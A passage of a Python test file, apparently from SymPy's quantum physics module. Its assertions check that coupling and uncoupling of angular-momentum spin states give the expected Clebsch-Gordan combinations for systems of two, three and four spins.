couple(uncouple(JzKetCoupled(2, 1, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(2, 0, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(2, 0, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(2, -1, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(2, -1, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(2, -2, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(2, -2, (S.Half, S.Half, S.Half, S.Half))))
)
# j1=1/2, j2=1/2, j3=1/2, j4=1
assert JzKetCoupled(S.Half, S.Half, (S.Half, S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(S.Half, S.Half, (S.Half, S.Half, S.Half, 1))))
)
assert JzKetCoupled(S.Half, Rational(-1, 2), (S.Half, S.Half, S.Half, 1)) == expand(
couple(
uncouple(JzKetCoupled(S.Half, Rational(-1, 2), (S.Half, S.Half, S.Half, 1)))
)
)
assert JzKetCoupled(
Rational(3, 2), Rational(3, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2), Rational(3, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(Rational(3, 2), S.Half, (S.Half, S.Half, S.Half, 1)) == expand(
couple(
uncouple(JzKetCoupled(Rational(3, 2), S.Half, (S.Half, S.Half, S.Half, 1)))
)
)
assert JzKetCoupled(
Rational(3, 2), Rational(-1, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2), Rational(-1, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(
Rational(3, 2), Rational(-3, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2), Rational(-3, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(
Rational(5, 2), Rational(5, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(5, 2), Rational(5, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(
Rational(5, 2), Rational(3, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(5, 2), Rational(3, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(Rational(5, 2), S.Half, (S.Half, S.Half, S.Half, 1)) == expand(
couple(
uncouple(JzKetCoupled(Rational(5, 2), S.Half, (S.Half, S.Half, S.Half, 1)))
)
)
assert JzKetCoupled(
Rational(5, 2), Rational(-1, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(5, 2), Rational(-1, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(
Rational(5, 2), Rational(-3, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(5, 2), Rational(-3, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(
Rational(5, 2), Rational(-5, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(5, 2), Rational(-5, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
# Coupling j1+j3=j13, j2+j4=j24, j13+j24=j
# j1=1/2, j2=1/2, j3=1/2, j4=1/2, j13=1, j24=0
assert JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 3, 1), (2, 4, 0), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 3, 1), (2, 4, 0), (1, 2, 1)),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 3, 1), (2, 4, 0), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 3, 1), (2, 4, 0), (1, 2, 1)),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 3, 1), (2, 4, 0), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 3, 1), (2, 4, 0), (1, 2, 1)),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
# j1=1/2, j2=1/2, j3=1/2, j4=1, j13=1, j24=1/2
assert JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, S.Half)),
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, S.Half)),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, S.Half)),
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, S.Half)),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
# j1=1/2, j2=1, j3=1/2, j4=1, j13=0, j24=1
assert JzKetCoupled(
1, 1, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, 1, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, 0, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, 0, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, -1, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, -1, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
# j1=1/2, j2=1, j3=1/2, j4=1, j13=1, j24=1
assert JzKetCoupled(
0, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 0))
) == expand(
couple(
uncouple(
JzKetCoupled(
0, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 0))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, 1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, 1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, -1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, -1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
2, 2, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
) == expand(
couple(
uncouple(
JzKetCoupled(
2, 2, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
2, 1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
) == expand(
couple(
uncouple(
JzKetCoupled(
2, 1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
2, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
) == expand(
couple(
uncouple(
JzKetCoupled(
2, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
2, -1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
) == expand(
couple(
uncouple(
JzKetCoupled(
2, -1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
2, -2, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
) == expand(
couple(
uncouple(
JzKetCoupled(
2, -2, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
def test_couple_2_states_numerical():
# j1=1/2, j2=1/2
assert couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half))
) == JzKetCoupled(1, 1, (S.Half, S.Half))
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))))
== sqrt(2) * JzKetCoupled(0, 0, (S(1) / 2, S.Half)) / 2
+ sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)))
== -sqrt(2) * JzKetCoupled(0, 0, (S(1) / 2, S.Half)) / 2
+ sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
)
assert couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)))
) == JzKetCoupled(1, -1, (S.Half, S.Half))
# j1=1, j2=1/2
assert couple(TensorProduct(JzKet(1, 1), JzKet(S.Half, S.Half))) == JzKetCoupled(
Rational(3, 2), Rational(3, 2), (1, S.Half)
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))))
== sqrt(6) * JzKetCoupled(S.Half, S.Half, (1, S.Half)) / 3
+ sqrt(3) * JzKetCoupled(Rational(3, 2), S.Half, (1, S.Half)) / 3
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(S.Half, S.Half)))
== -sqrt(3) * JzKetCoupled(S.Half, S.Half, (1, S.Half)) / 3
+ sqrt(6) * JzKetCoupled(Rational(3, 2), S.Half, (1, S.Half)) / 3
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))))
== sqrt(3) * JzKetCoupled(S.Half, Rational(-1, 2), (1, S.Half)) / 3
+ sqrt(6) * JzKetCoupled(Rational(3, 2), Rational(-1, 2), (1, S.Half)) / 3
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(S.Half, S.Half)))
== -sqrt(6) * JzKetCoupled(S.Half, Rational(-1, 2), (1, S(1) / 2)) / 3
+ sqrt(3) * JzKetCoupled(Rational(3, 2), Rational(-1, 2), (1, S.Half)) / 3
)
assert couple(
TensorProduct(JzKet(1, -1), JzKet(S.Half, Rational(-1, 2)))
) == JzKetCoupled(Rational(3, 2), Rational(-3, 2), (1, S.Half))
# j1=1, j2=1
assert couple(TensorProduct(JzKet(1, 1), JzKet(1, 1))) == JzKetCoupled(2, 2, (1, 1))
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0)))
== sqrt(2) * JzKetCoupled(1, 1, (1, 1)) / 2
+ sqrt(2) * JzKetCoupled(2, 1, (1, 1)) / 2
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1)))
== sqrt(3) * JzKetCoupled(0, 0, (1, 1)) / 3
+ sqrt(2) * JzKetCoupled(1, 0, (1, 1)) / 2
+ sqrt(6) * JzKetCoupled(2, 0, (1, 1)) / 6
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1)))
== -sqrt(2) * JzKetCoupled(1, 1, (1, 1)) / 2
+ sqrt(2) * JzKetCoupled(2, 1, (1, 1)) / 2
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0)))
== -sqrt(3) * JzKetCoupled(0, 0, (1, 1)) / 3
+ sqrt(6) * JzKetCoupled(2, 0, (1, 1)) / 3
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1)))
== sqrt(2) * JzKetCoupled(1, -1, (1, 1)) / 2
+ sqrt(2) * JzKetCoupled(2, -1, (1, 1)) / 2
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1)))
== sqrt(3) * JzKetCoupled(0, 0, (1, 1)) / 3
- sqrt(2) * JzKetCoupled(1, 0, (1, 1)) / 2
+ sqrt(6) * JzKetCoupled(2, 0, (1, 1)) / 6
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0)))
== -sqrt(2) * JzKetCoupled(1, -1, (1, 1)) / 2
+ sqrt(2) * JzKetCoupled(2, -1, (1, 1)) / 2
)
assert couple(TensorProduct(JzKet(1, -1), JzKet(1, -1))) == JzKetCoupled(
2, -2, (1, 1)
)
# j1=3/2, j2=1/2
assert couple(
TensorProduct(JzKet(Rational(3, 2), Rational(3, 2)), JzKet(S.Half, S.Half))
) == JzKetCoupled(2, 2, (Rational(3, 2), S.Half))
assert (
couple(
TensorProduct(
JzKet(Rational(3, 2), Rational(3, 2)), JzKet(S.Half, Rational(-1, 2))
)
)
== sqrt(3) * JzKetCoupled(1, 1, (Rational(3, 2), S.Half)) / 2
+ JzKetCoupled(2, 1, (Rational(3, 2), S.Half)) / 2
)
assert (
couple(TensorProduct(JzKet(Rational(3, 2), S.Half), JzKet(S.Half, S.Half)))
== -JzKetCoupled(1, 1, (S(3) / 2, S.Half)) / 2
+ sqrt(3) * JzKetCoupled(2, 1, (Rational(3, 2), S.Half)) / 2
)
assert (
couple(
TensorProduct(JzKet(Rational(3, 2), S.Half), JzKet(S.Half, Rational(-1, 2)))
)
== sqrt(2) * JzKetCoupled(1, 0, (S(3) / 2, S.Half)) / 2
+ sqrt(2) * JzKetCoupled(2, 0, (Rational(3, 2), S.Half)) / 2
)
assert (
couple(
TensorProduct(JzKet(Rational(3, 2), Rational(-1, 2)), JzKet(S.Half, S.Half))
)
== -sqrt(2) * JzKetCoupled(1, 0, (S(3) / 2, S.Half)) / 2
+ sqrt(2) * JzKetCoupled(2, 0, (Rational(3, 2), S.Half)) / 2
)
assert (
couple(
TensorProduct(
JzKet(Rational(3, 2), Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))
)
)
== JzKetCoupled(1, -1, (S(3) / 2, S.Half)) / 2
+ sqrt(3) * JzKetCoupled(2, -1, (Rational(3, 2), S.Half)) / 2
)
assert (
couple(
TensorProduct(JzKet(Rational(3, 2), Rational(-3, 2)), JzKet(S.Half, S.Half))
)
== -sqrt(3) * JzKetCoupled(1, -1, (Rational(3, 2), S.Half)) / 2
+ JzKetCoupled(2, -1, (Rational(3, 2), S.Half)) / 2
)
assert couple(
TensorProduct(
JzKet(Rational(3, 2), Rational(-3, 2)), JzKet(S.Half, Rational(-1, 2))
)
) == JzKetCoupled(2, -2, (Rational(3, 2), S.Half))
def test_couple_3_states_numerical():
# Default coupling
# j1=1/2,j2=1/2,j3=1/2
assert couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
)
) == JzKetCoupled(
Rational(3, 2),
S(3) / 2,
(S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 2, 1), (1, 3, S.Half))
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.One / 2),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 2, 0), (1, 3, S.Half))
)
/ 2
- sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 2, 1), (1, 3, S.Half))
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.One / 2),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.One / 2),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
== -sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 2, 0), (1, 3, S.Half))
)
/ 2
- sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 2, 1), (1, 3, S.Half))
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.One / 2),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.One / 2),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.One / 2),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
) == JzKetCoupled(
Rational(3, 2),
-S(3) / 2,
(S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
# j1=S.Half, j2=S.Half, j3=1
assert couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1))
) == JzKetCoupled(2, 2, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2)))
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0)))
== sqrt(2) * JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(2) * JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1))
)
== sqrt(3) * JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 0))) / 3
+ sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(6) * JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
)
== sqrt(2) * JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1))) / 2
- JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
)
== -sqrt(6)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 0)))
/ 6
+ sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1))) / 2
+ sqrt(3) * JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
)
== sqrt(2)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1)))
/ 2
+ JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 1)
)
)
== -sqrt(2)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1)))
/ 2
- JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 0)
)
)
== -sqrt(6)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 0)))
/ 6
- sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1))) / 2
+ sqrt(3) * JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, -1)
)
)
== -sqrt(2)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1)))
/ 2
+ JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
)
)
== sqrt(3) * JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 0))) / 3
- sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(6) * JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
)
)
== -sqrt(2)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1)))
/ 2
+ sqrt(2) * JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
) == JzKetCoupled(2, -2, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2)))
# j1=S.Half, j2=1, j3=1
assert couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 1))
) == JzKetCoupled(
Rational(5, 2),
Rational(5, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)))
== sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)))
== sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, Rational(3, 2)), (1, 3, S.Half))
)
/ 2
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)))
== sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)))
== JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half))
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, Rational(3, 2)), (1, 3, S.Half))
)
/ 3
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
